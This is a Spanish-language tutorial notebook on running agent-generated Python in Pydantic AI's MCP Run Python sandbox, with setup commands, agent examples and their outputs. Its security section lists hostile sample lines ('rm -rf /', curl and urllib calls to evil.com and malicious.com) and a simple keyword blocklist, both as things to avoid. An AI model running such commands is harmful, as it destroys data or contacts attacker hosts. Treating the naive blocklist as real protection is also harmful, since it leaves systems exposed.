# MCP Run Python - Ejecuci√≥n Segura de C√≥digo Python

En esta notebook exploraremos **MCP Run Python**, el servidor MCP oficial desarrollado por el equipo de Pydantic AI que permite la **ejecuci√≥n segura de c√≥digo Python** en un entorno sandboxed. Esta es la **tercera forma** en la que Pydantic AI trabaja con MCP: **servidores MCP desarrollados como parte de Pydantic AI**.

## 1. Introducci√≥n y Arquitectura

### ¬øQu√© es MCP Run Python?

MCP Run Python es un **servidor MCP especializado** que permite a los agentes de IA ejecutar c√≥digo Python de forma segura en un entorno completamente aislado. Es la respuesta a una necesidad cr√≠tica: **¬øc√≥mo permitir que la IA ejecute c√≥digo sin comprometer la seguridad del sistema?**

**Caracter√≠sticas principales:**
- ‚úÖ **Ejecuci√≥n segura**: C√≥digo aislado del sistema host
- ‚úÖ **Gesti√≥n autom√°tica de dependencias**: Instala paquetes seg√∫n se necesiten
- ‚úÖ **Resultados completos**: Captura stdout, stderr y valores de retorno
- ‚úÖ **Soporte as√≠ncrono**: Ejecuta c√≥digo async correctamente
- ‚úÖ **Manejo de errores detallado**: Reportes completos para debugging

### Arquitectura: Pyodide + Deno + WebAssembly

La arquitectura de MCP Run Python es una **innovaci√≥n t√©cnica** que combina tres tecnolog√≠as clave:

```mermaid
graph TD
    A[Agente PydanticAI] -->|MCP Protocol| B[MCP Run Python Server]
    B -->|JavaScript Runtime| C[Deno]
    C -->|WebAssembly| D[Pyodide]
    D -->|Python Execution| E[C√≥digo Python + Librer√≠as]
    
    F[Sistema Host] -.->|Aislado| D
    G[Sistema de Archivos] -.->|Sin acceso directo| D
    H[Red del Host] -.->|Controlado| D
```

**Componentes de la arquitectura:**

1. **Deno**: Runtime JavaScript/TypeScript seguro que proporciona:
   - Sandboxing a nivel de sistema operativo
   - Control granular de permisos
   - Gesti√≥n de dependencias moderna

2. **Pyodide**: Distribuci√≥n completa de Python compilada a WebAssembly:
   - Incluye la biblioteca est√°ndar de Python
   - Soporte para numpy, pandas, matplotlib y m√°s
   - Ejecuci√≥n completamente aislada

3. **WebAssembly (WASM)**: Tecnolog√≠a de sandboxing:
   - Aislamiento a nivel de memoria
   - Sin acceso directo al sistema de archivos
   - Comunicaci√≥n controlada con el host

### Casos de Uso y Beneficios de Seguridad

**Casos de uso ideales:**
- üìä **An√°lisis de datos**: Procesamiento seguro de datasets
- üß™ **Experimentaci√≥n de c√≥digo**: Pruebas sin riesgo
- üìö **Educaci√≥n y tutoriales**: Entornos de aprendizaje seguros
- üåê **APIs p√∫blicas**: Ejecuci√≥n de c√≥digo de usuarios
- üî¨ **Investigaci√≥n**: Validaci√≥n de algoritmos
- ü§ñ **Agentes aut√≥nomos**: IA que necesita ejecutar c√≥digo

**Beneficios de seguridad:**
- üõ°Ô∏è **Aislamiento completo**: Sin acceso al sistema host
- üîí **Sin persistencia**: El estado se reinicia en cada ejecuci√≥n
- üö´ **Sin acceso a red**: Controlado por permisos de Deno
- üìÅ **Sin sistema de archivos**: Sin lectura/escritura de archivos host
- ‚è±Ô∏è **Timeouts autom√°ticos**: Prevenci√≥n de bucles infinitos
- üéØ **Surface attack m√≠nima**: Tecnolog√≠as probadas en producci√≥n


## 2. Instalaci√≥n y Configuraci√≥n

### Migraci√≥n de npm/npx a Deno

**Anteriormente (deprecado):**
```bash
# ‚ùå M√©todo anterior con npm
npx @pydantic/mcp-run-python
```

**M√©todo actual recomendado:**
```bash
# ‚úÖ M√©todo actual con Deno
deno run \
  -N -R=node_modules -W=node_modules --node-modules-dir=auto \
  jsr:@pydantic/mcp-run-python [transport]
```

**¬øPor qu√© el cambio a Deno?**
- üîê **Mejor sandboxing**: Permisos m√°s granulares
- ‚ö° **Mejor rendimiento**: Runtime m√°s eficiente
- üõ†Ô∏è **Mejor seguridad**: Modelo de permisos m√°s robusto
- üì¶ **Gesti√≥n moderna**: Sin npm, dependencias directas

### Diferentes Transportes

MCP Run Python soporta **m√∫ltiples transportes** seg√∫n tus necesidades:

#### 1. **stdio** - Subprocesos Locales
```bash
deno run \
  -N -R=node_modules -W=node_modules --node-modules-dir=auto \
  jsr:@pydantic/mcp-run-python stdio
```
**Caso de uso:** Integraci√≥n directa con PydanticAI como subproceso

#### 2. **streamable_http** - Servidor HTTP con Estado
```bash
deno run \
  -N -R=node_modules -W=node_modules --node-modules-dir=auto \
  jsr:@pydantic/mcp-run-python streamable_http
```
**Caso de uso:** Servicio remoto con requests con estado pero sin conexi√≥n persistente

#### 3. **sse** - Server-Sent Events
```bash
deno run \
  -N -R=node_modules -W=node_modules --node-modules-dir=auto \
  jsr:@pydantic/mcp-run-python sse
```
**Caso de uso:** Conexiones remotas con streaming en tiempo real

#### 4. **warmup** - Precarga de Cache
```bash
deno run \
  -N -R=node_modules -W=node_modules --node-modules-dir=auto \
  jsr:@pydantic/mcp-run-python warmup
```
**Caso de uso:** Precarga la biblioteca est√°ndar de Python y verifica funcionamiento

### Permisos y Configuraci√≥n de Seguridad

**Explicaci√≥n de permisos de Deno:**

```bash
-N                      # Alias de --allow-net
-R=node_modules         # --allow-read=node_modules
-W=node_modules         # --allow-write=node_modules
--node-modules-dir=auto # Gesti√≥n autom√°tica de node_modules
```

**¬øPor qu√© estos permisos espec√≠ficos?**
- `--allow-net`: Pyodide necesita descargar la biblioteca est√°ndar de Python
- `--allow-read/write=node_modules`: Cache local de paquetes Python
- Sin otros permisos: **No acceso** al sistema de archivos host

## 3. Uso B√°sico con PydanticAI

### Cliente MCP usando MCPServerStdio

Archivo `mcp_client_run_python.py`:

```python
import asyncio
from pydantic_ai import Agent
from pydantic_ai.mcp import MCPServerStdio

# Configuraci√≥n del servidor MCP Run Python
server = MCPServerStdio(
    'deno',
    args=[
        'run',
        '-N',
        '-R=node_modules',
        '-W=node_modules',
        '--node-modules-dir=auto',
        'jsr:@pydantic/mcp-run-python',
        'stdio',
    ]
)

# Agente con capacidad de ejecutar Python
agent = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server],
    system_prompt=(
        'Eres un asistente de programaci√≥n que puede ejecutar c√≥digo Python '
        'para resolver problemas matem√°ticos y de an√°lisis de datos.'
    )
)

async def main():
    async with agent:
        result = await agent.run(
            'Calcula la media y desviaci√≥n est√°ndar de los n√∫meros [1, 2, 3, 4, 5, 10, 100]'
        )
        print(result.output)

if __name__ == '__main__':
    asyncio.run(main())
```

### Ejecuci√≥n de C√≥digo Simple

**El agente recibir√° autom√°ticamente la herramienta `run_python_code`:**

```json
{
  "name": "run_python_code",
  "description": "Run Python code in a secure sandbox",
  "inputSchema": {
    "type": "object",
    "properties": {
      "python_code": {
        "type": "string",
        "description": "Python code to run"
      }
    },
    "required": ["python_code"]
  }
}
```

**Ejemplo de c√≥digo que ejecutar√≠a el agente:**
```python
import statistics

data = [1, 2, 3, 4, 5, 10, 100]
mean = statistics.mean(data)
std_dev = statistics.stdev(data)

print(f"Media: {mean}")
print(f"Desviaci√≥n est√°ndar: {std_dev}")

{"mean": mean, "std_dev": std_dev}
```

### Manejo de Resultados y Errores

**Formato de respuesta exitosa:**
```xml
<status>success</status>
<dependencies>["statistics"]</dependencies>
<o>
Media: 17.857142857142858
Desviaci√≥n est√°ndar: 35.68842267531884
</o>
<return_value>
{
  "mean": 17.857142857142858,
  "std_dev": 35.68842267531884
}
</return_value>
```

**Formato de respuesta con error:**
```xml
<status>run-error</status>
<dependencies>[]</dependencies>
<error>
ZeroDivisionError: division by zero
  File "<main>", line 3, in <module>
    result = 10 / 0
</error>
```


![image.png](attachment:1fea0914-d835-4301-8f30-191eaa35754f.png)

## 4. Gesti√≥n de Dependencias

### Inferencia Autom√°tica de Imports

MCP Run Python **detecta autom√°ticamente** las dependencias bas√°ndose en las declaraciones `import`:

```python
# El agente puede ejecutar este c√≥digo
code = """
import numpy as np
import pandas as pd

# Pyodide autom√°ticamente instalar√° numpy y pandas
data = np.array([1, 2, 3, 4, 5])
df = pd.DataFrame({'values': data})
print(df.describe())
df.to_dict()
"""
```

**Resultado:**
```xml
<status>success</status>
<dependencies>["numpy", "pandas"]</dependencies>
<o>
       values
count     5.0
mean      3.0
std       1.581139
min       1.0
25%       2.0
50%       3.0
75%       4.0
max       5.0
</o>
<return_value>{"values": [1, 2, 3, 4, 5]}</return_value>
```

### PEP 723 Metadata en Scripts

Para **control m√°s preciso** de dependencias, usa metadatos inline seg√∫n **PEP 723**:

```python
code = '''
# /// script
# dependencies = ["pydantic", "email-validator", "requests==2.31.0"]
# ///

import pydantic
import requests

class UserModel(pydantic.BaseModel):
    email: pydantic.EmailStr
    age: int = pydantic.Field(ge=0, le=120)

# Validaci√≥n de datos
user = UserModel(email="test@example.com", age=25)
print(f"Usuario v√°lido: {user}")

# Tambi√©n podemos hacer requests (si el servidor lo permite)
# response = requests.get("https://api.example.com/data")

user.model_dump()
'''
```

### Versionado y Constraints

**Caracter√≠sticas del sistema de dependencias:**

1. **Paquetes binarios**: Versi√≥n fija en Pyodide (ej: numpy, pandas)
2. **Paquetes pure-Python**: Versionado flexible con pip
3. **Instalaci√≥n autom√°tica**: Sin configuraci√≥n manual
4. **Cache inteligente**: Dependencias se reutilizan entre ejecuciones

**Ejemplo con constraints espec√≠ficos:**
```python
# /// script
# dependencies = [
#     "rich<13",           # Versi√≥n espec√≠fica
#     "click>=8.0",        # Versi√≥n m√≠nima  
#     "pydantic==2.5.0"    # Versi√≥n exacta
# ]
# ///

from rich.console import Console
import click

console = Console()
console.print("¬°Hola mundo con Rich!", style="bold blue")
```

## 5. Ejemplos Pr√°cticos

### An√°lisis de Datos con numpy/pandas

```python
agent_data_analysis = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server],
    system_prompt=(
        'Eres un analista de datos experto. Usa Python para realizar '
        'an√°lisis estad√≠sticos detallados y crear visualizaciones cuando sea apropiado.'
    )
)

async def analyze_sales_data():
    async with agent_data_analysis:
        result = await agent_data_analysis.run('''
        Analiza estos datos de ventas y proporciona insights:
        - Ventas mensuales: [15000, 18000, 22000, 19000, 25000, 28000, 30000, 26000, 23000, 27000, 31000, 35000]
        - Costos mensuales: [8000, 9500, 11000, 10000, 13000, 14500, 15000, 13500, 12000, 14000, 16000, 18000]
        
        Calcula:
        1. Margen de beneficio por mes
        2. Tendencia de crecimiento
        3. Proyecci√≥n para los pr√≥ximos 3 meses
        4. Recomendaciones basadas en los datos
        ''')
        print(result.output)
```

*Salida:*

```raw
(workshop2) joviedo@LAPTOP-F5VFQF4J:~/github-repos/llm-zoomcamp-knowledge-base/workshop2/notebook/mcp$ python mcp_client_run_python_2.py
Aqu√≠ tienes el an√°lisis de las ventas y costos mensuales:

### 1. Margen de beneficio por mes
El margen de beneficio se calcula como la diferencia entre las ventas y los costos. Aqu√≠ est√°n los m√°rgenes de beneficio para cada mes:

- Mes 1: $7,000
- Mes 2: $8,500
- Mes 3: $11,000
- Mes 4: $9,000
- Mes 5: $12,000
- Mes 6: $13,500
- Mes 7: $15,000
- Mes 8: $12,500
- Mes 9: $11,000
- Mes 10: $13,000
- Mes 11: $15,000
- Mes 12: $17,000

### 2. Tendencia de crecimiento
La tendencia de crecimiento en las ventas indica que las ventas est√°n aumentando de manera constante. Esto se puede observar en el comportamiento de los m√°rgenes de beneficio, que tambi√©n muestran un incremento al final del periodo.

### 3. Proyecci√≥n para los pr√≥ximos 3 meses
Las proyecciones de ventas para los pr√≥ximos 3 meses, asumiendo que la tendencia se mantendr√°, son:

- Mes 13: $32,370.06
- Mes 14: $33,576.12
- Mes 15: $34,782.18

### 4. Recomendaciones basadas en los datos
- **Continuar el monitoreo de costos**: Aseg√∫rate de que los costos no aumenten desproporcionadamente en comparaci√≥n con las ventas, ya que esto puede erosionar el margen de beneficio.
- **Aprovechar el crecimiento de ventas**: Considera invertir en marketing o en expandir la l√≠nea de productos para aprovechar la tendencia de crecimiento de las ventas.
- **Revisi√≥n del proceso de producci√≥n o de la cadena de suministro**: Optimizar la eficiencia podr√≠a permitir a√∫n mejores m√°rgenes de beneficio.
- **Establecer un fondo de emergencia**: Utiliza el incremento en los m√°rgenes de beneficio para establecer reservas que puedan ser √∫tiles durante meses con ventas m√°s bajas.

Si necesitas m√°s an√°lisis o visualizaciones espec√≠ficas, h√°zmelo saber.
```

---

### Validaci√≥n Pydantic en Sandbox

```python
agent_validation = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server],
    system_prompt=(
        'Eres un experto en validaci√≥n de datos. Usa Pydantic para crear '
        'modelos robustos y validar datos de entrada seg√∫n las especificaciones.'
    )
)

async def validate_api_data():
    async with agent_validation:
        result = await agent_validation.run('''
        Crea un modelo Pydantic para validar datos de un API de e-commerce:
        
        Requisitos:
        - ID del producto (string, formato UUID)
        - Nombre (string, 3-100 caracteres)
        - Precio (decimal, mayor a 0, m√°ximo 2 decimales)
        - Categor√≠a (enum: electronics, clothing, books, home, sports)
        - Stock (entero, >= 0)
        - Fecha de creaci√≥n (datetime)
        - Email del vendedor (email v√°lido)
        - Descripci√≥n (opcional, m√°ximo 500 caracteres)
        
        Luego valida estos datos de prueba:
        {
            "product_id": "123e4567-e89b-12d3-a456-426614174000",
            "name": "Smartphone XYZ",
            "price": "299.99",
            "category": "electronics",
            "stock": 50,
            "created_at": "2024-01-15T10:30:00Z",
            "seller_email": "vendor@example.com",
            "description": "High-performance smartphone with great camera"
        }
        ''')
        print(result.output)
```

*Salida:*

```raw
(workshop2) joviedo@LAPTOP-F5VFQF4J:~/github-repos/llm-zoomcamp-knowledge-base/workshop2/notebook/mcp$ python mcp_client_run_python_3.py
He creado un modelo Pydantic para validar los datos de un producto de e-commerce seg√∫n tus especificaciones. A continuaci√≥n se presenta el modelo y los resultados de la validaci√≥n de los datos de prueba:

### Modelo de Producto

from pydantic import BaseModel, constr, condecimal, EmailStr
from pydantic import conint
from uuid import UUID
from datetime import datetime
from enum import Enum
from typing import Optional

class ProductCategory(str, Enum):
    electronics = 'electronics'
    clothing = 'clothing'
    books = 'books'
    home = 'home'
    sports = 'sports'

class Product(BaseModel):
    product_id: UUID
    name: constr(min_length=3, max_length=100)
    price: condecimal(gt=0, max_digits=10, decimal_places=2)
    category: ProductCategory
    stock: conint(ge=0)
    created_at: datetime
    seller_email: str
    description: Optional[constr(max_length=500)]

### Datos de Prueba

Los datos de prueba proporcionados fueron:


{
    "product_id": "123e4567-e89b-12d3-a456-426614174000",
    "name": "Smartphone XYZ",
    "price": "299.99",
    "category": "electronics",
    "stock": 50,
    "created_at": "2024-01-15T10:30:00Z",
    "seller_email": "vendor@example.com",
    "description": "High-performance smartphone with great camera"
}

### Resultados de la Validaci√≥n

Los datos fueron validados correctamente y el resultado es el siguiente:

{
  "product_id": "123e4567-e89b-12d3-a456-426614174000",
  "name": "Smartphone XYZ",
  "price": "299.99",
  "category": "electronics",
  "stock": 50,
  "created_at": "2024-01-15T10:30:00Z",
  "seller_email": "vendor@example.com",
  "description": "High-performance smartphone with great camera"
}

El modelo ha validado correctamente todos los campos seg√∫n las especificaciones establecidas. Si necesitas realizar alguna modificaci√≥n o a√±adir m√°s funcionalidades, h√°zmelo saber.
```

---

### Visualizaciones con matplotlib

```python
agent_visualization = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server],
    system_prompt=(
        'Eres un especialista en visualizaci√≥n de datos. Crea gr√°ficos '
        'informativos y est√©ticamente agradables usando matplotlib.'
    )
)

async def create_visualizations():
    async with agent_visualization:
        result = await agent_visualization.run('''
        Crea una visualizaci√≥n completa para estos datos de temperatura:
        
        Ciudades: ["Asunci√≥n", "Ciudad del Este", "Encarnaci√≥n", "Concepci√≥n", "Pedro Juan Caballero"]
        Temperaturas promedio (¬∞C): [28, 26, 27, 29, 25]
        Humedad (%): [78, 82, 75, 70, 85]
        
        Crea:
        1. Un gr√°fico de barras para las temperaturas
        2. Un gr√°fico de dispersi√≥n temperatura vs humedad
        3. Un gr√°fico combinado con ambas m√©tricas
        
        Aseg√∫rate de incluir t√≠tulos, etiquetas de ejes, leyendas y colores apropiados.
        ''')
        print(result.output)
```

*Salida:*

```raw
(workshop2) joviedo@LAPTOP-F5VFQF4J:~/github-repos/llm-zoomcamp-knowledge-base/workshop2/notebook/mcp$ python mcp_client_run_python_4.py
Parece que hubo un error al intentar crear los gr√°ficos debido a problemas con la biblioteca de visualizaci√≥n de datos. Sin embargo, puedo proporcionarte el c√≥digo para crear los gr√°ficos que necesitas usando `matplotlib`. Puedes ejecutar este c√≥digo en tu entorno local.

Aqu√≠ tienes el c√≥digo para cada uno de los gr√°ficos:

import matplotlib.pyplot as plt
import numpy as np

# Datos
ciudades = ["Asunci√≥n", "Ciudad del Este", "Encarnaci√≥n", "Concepci√≥n", "Pedro Juan Caballero"]
temperaturas = [28, 26, 27, 29, 25]
humedad = [78, 82, 75, 70, 85]

# 1. Gr√°fico de barras para las temperaturas
plt.figure(figsize=(12, 8))
plt.bar(ciudades, temperaturas, color='skyblue')
plt.title('Temperaturas Promedio por Ciudad', fontsize=16)
plt.xlabel('Ciudades', fontsize=14)
plt.ylabel('Temperatura (¬∞C)', fontsize=14)
plt.xticks(rotation=45)
plt.grid(axis='y')
plt.tight_layout()
plt.show()  # Muestra el gr√°fico de barras

# 2. Gr√°fico de dispersi√≥n temperatura vs humedad
plt.figure(figsize=(12, 8))
plt.scatter(temperaturas, humedad, color='orange', s=100)
for i, city in enumerate(ciudades):
    plt.text(temperaturas[i], humedad[i], city, fontsize=12, ha='right')
plt.title('Temperatura vs Humedad', fontsize=16)
plt.xlabel('Temperatura (¬∞C)', fontsize=14)
plt.ylabel('Humedad (%)', fontsize=14)
plt.grid()
plt.tight_layout()
plt.show()  # Muestra el gr√°fico de dispersi√≥n

# 3. Gr√°fico combinado
fig, ax1 = plt.subplots(figsize=(12, 8))

# Gr√°fico de barras para temperaturas
color = 'tab:blue'
ax1.set_xlabel('Ciudades')
ax1.set_ylabel('Temperatura (¬∞C)', color=color)
ax1.bar(ciudades, temperaturas, color=color, alpha=0.6, label='Temperatura promedio')
ax1.tick_params(axis='y', labelcolor=color)

# Crear un segundo eje para la humedad
ax2 = ax1.twinx()
color = 'tab:red'
ax2.set_ylabel('Humedad (%)', color=color)
ax2.plot(ciudades, humedad, color=color, marker='o', label='Humedad promedio')
ax2.tick_params(axis='y', labelcolor=color)

# T√≠tulos y leyendas
plt.title('Temperatura y Humedad por Ciudad', fontsize=16)
fig.tight_layout()
plt.grid(axis='y')
plt.show()  # Muestra el gr√°fico combinado

Aseg√∫rate de tener instaladas las librer√≠as `matplotlib` y `numpy`. Puedes instalarlas utilizando `pip`:

pip install matplotlib numpy

Luego, copia y pega el c√≥digo en un archivo Python y ejec√∫talo. Esto generar√° los tres gr√°ficos que solicitas.
```

---

### APIs REST que Ejecutan C√≥digo de Usuarios

```python
import asyncio
import uvicorn
from pydantic_ai import Agent
from pydantic_ai.mcp import MCPServerStdio
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
from dotenv import load_dotenv

load_dotenv()

server = MCPServerStdio(
    'deno',
    args=[
        'run',
        '-N',
        '-R=node_modules',
        '-W=node_modules',
        '--node-modules-dir=auto',
        'jsr:@pydantic/mcp-run-python',
        'stdio',
    ]
)

app = FastAPI(title="Code Execution API")

class CodeRequest(BaseModel):
    code: str
    timeout: int = 30

class CodeResponse(BaseModel):
    status: str
    output: str

@app.post("/execute", response_model=CodeResponse)
async def execute_code(request: CodeRequest):
    """
    API endpoint que permite a usuarios ejecutar c√≥digo Python de forma segura
    """
    try:
        # Configurar el agente con timeout personalizado
        execution_agent = Agent(
            'openai:gpt-4o-mini',
            toolsets=[server],
            system_prompt=f'''
            Ejecuta el siguiente c√≥digo Python en el sandbox:
            
            {request.code}
            
            Importante:
            - Si el c√≥digo tiene errores, rep√≥rtalos claramente
            - Si el c√≥digo es potencialmente peligroso, no lo ejecutes
            - Limita la ejecuci√≥n a {request.timeout} segundos conceptualmente
            '''
        )
        
        async with execution_agent:
            result = await execution_agent.run("Ejecuta el c√≥digo proporcionado")
            
            return CodeResponse(
                status="success",
                output=result.output
            )
            
    except Exception as e:
        raise HTTPException(
            status_code=500,
            detail=f"Error ejecutando c√≥digo: {str(e)}"
        )


if __name__ == "__main__":
    uvicorn.run("mcp_client_run_python_5:app", host="0.0.0.0", port=8000, reload=True)
```

![image.png](attachment:ea19ad09-bc4e-4385-b031-632468459a67.png)

![image.png](attachment:2d234f7c-7c7f-46ea-8f0e-b1309f385945.png)

![image.png](attachment:302e2af3-7bdd-49f6-8802-4a70aa4de5df.png)

## 6. Seguridad y Mejores Pr√°cticas

### Limitaciones del Sandbox

**Qu√© S√ç permite:**
- ‚úÖ Ejecuci√≥n de c√≥digo Python est√°ndar
- ‚úÖ Uso de librer√≠as cient√≠ficas (numpy, pandas, scipy)
- ‚úÖ C√°lculos matem√°ticos complejos
- ‚úÖ Manipulaci√≥n de datos en memoria
- ‚úÖ Importaci√≥n de paquetes disponibles en Pyodide

**Qu√© NO permite:**
- ‚ùå Acceso al sistema de archivos host
- ‚ùå Conexiones de red directas
- ‚ùå Importaci√≥n de m√≥dulos del sistema host
- ‚ùå Ejecuci√≥n de c√≥digo nativo/C
- ‚ùå Persistencia de datos entre ejecuciones
- ‚ùå Acceso a variables de entorno del host

### Timeouts y Resource Limits

```python
# Configuraci√≥n de l√≠mites de recursos
server_with_limits = MCPServerStdio(
    'deno',
    args=[
        'run',
        '-N', '-R=node_modules', '-W=node_modules',
        '--node-modules-dir=auto',
        'jsr:@pydantic/mcp-run-python',
        'stdio'
    ],
    timeout=30,  # Timeout de inicializaci√≥n (segundos)
    tool_retry_limit=2,  # M√°ximo de reintentos
)

# Agente con protecciones adicionales
secure_agent = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server_with_limits],
    system_prompt='''
    RESTRICCIONES DE SEGURIDAD:
    1. NO ejecutes bucles infinitos o c√≥digo que pueda no terminar
    2. NO intentes acceder a archivos o red
    3. Limita el procesamiento a datasets razonables (< 1M elementos)
    4. Si el c√≥digo parece sospechoso, explica por qu√© no lo ejecutar√°s
    5. Siempre valida la entrada antes de procesar
    '''
)
```

### Logging y Monitoreo

```python
import logging
from pydantic_ai.mcp import MCPServerStdio

# Configurar logging detallado
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

def mcp_log_handler(level: str, message: str, data: dict = None):
    """Handler personalizado para logs de MCP"""
    logger.log(
        getattr(logging, level.upper(), logging.INFO),
        f"MCP: {message}",
        extra={"mcp_data": data}
    )

monitored_server = MCPServerStdio(
    'deno',
    args=[
        'run',
        '-N', '-R=node_modules', '-W=node_modules',
        '--node-modules-dir=auto',
        'jsr:@pydantic/mcp-run-python',
        'stdio'
    ],
    log_level='debug',  # Habilitar logging detallado
    log_handler=mcp_log_handler
)

# Agente con monitoreo
monitored_agent = Agent(
    'openai:gpt-4o-mini',
    toolsets=[monitored_server],
    system_prompt='Ejecuta c√≥digo con logging detallado habilitado'
)

async def monitored_execution():
    async with monitored_agent:
        try:
            result = await monitored_agent.run(
                'Calcula los primeros 1000 n√∫meros primos y mide el tiempo de ejecuci√≥n'
            )
            logger.info(f"Ejecuci√≥n exitosa: {len(result.output)} caracteres de salida")
            return result
        except Exception as e:
            logger.error(f"Error en ejecuci√≥n: {e}")
            raise
```

### Casos de Uso Seguros vs Peligrosos

**‚úÖ CASOS DE USO SEGUROS:**

```python
# An√°lisis de datos cient√≠ficos
safe_examples = [
    "Calcular estad√≠sticas de un dataset",
    "Crear visualizaciones con matplotlib",
    "Validar modelos Pydantic",
    "Resolver ecuaciones matem√°ticas",
    "Procesar text mining b√°sico",
    "An√°lisis de series temporales",
    "Machine learning con scikit-learn"
]

# Ejemplo seguro
safe_agent = Agent(
    'openai:gpt-4o-mini',
    toolsets=[server],
    system_prompt='''
    Ejecuta solo c√≥digo relacionado con:
    - An√°lisis de datos cient√≠ficos
    - C√°lculos matem√°ticos
    - Visualizaciones
    - Validaci√≥n de datos
    NO ejecutes c√≥digo que intente acceso a sistema o red.
    '''
)
```

**‚ùå CASOS PELIGROSOS A EVITAR:**

```python
# Ejemplos de lo que NO hacer
dangerous_patterns = [
    "import os; os.system('rm -rf /')",  # Comandos de sistema
    "import urllib; urllib.request.urlopen('http://malicious.com')",  # Red
    "while True: pass",  # Bucles infinitos
    "import subprocess; subprocess.run(['curl', 'evil.com'])",  # Subprocesos
    "[1] * 10**9",  # Consumo excesivo de memoria
]

# Agente con validaci√≥n estricta
def validate_code_safety(code: str) -> bool:
    """Validaci√≥n b√°sica de seguridad del c√≥digo"""
    dangerous_imports = ['os', 'subprocess', 'urllib', 'requests', 'socket']
    dangerous_patterns = ['while True', 'for i in range(10**', 'import sys']
    
    for dangerous in dangerous_imports + dangerous_patterns:
        if dangerous in code:
            return False
    return True

# Uso con validaci√≥n
async def safe_execution(user_code: str):
    if not validate_code_safety(user_code):
        raise ValueError("C√≥digo potencialmente peligroso detectado")
    
    async with safe_agent:
        result = await safe_agent.run(f"Ejecuta este c√≥digo validado: {user_code}")
        return result
```
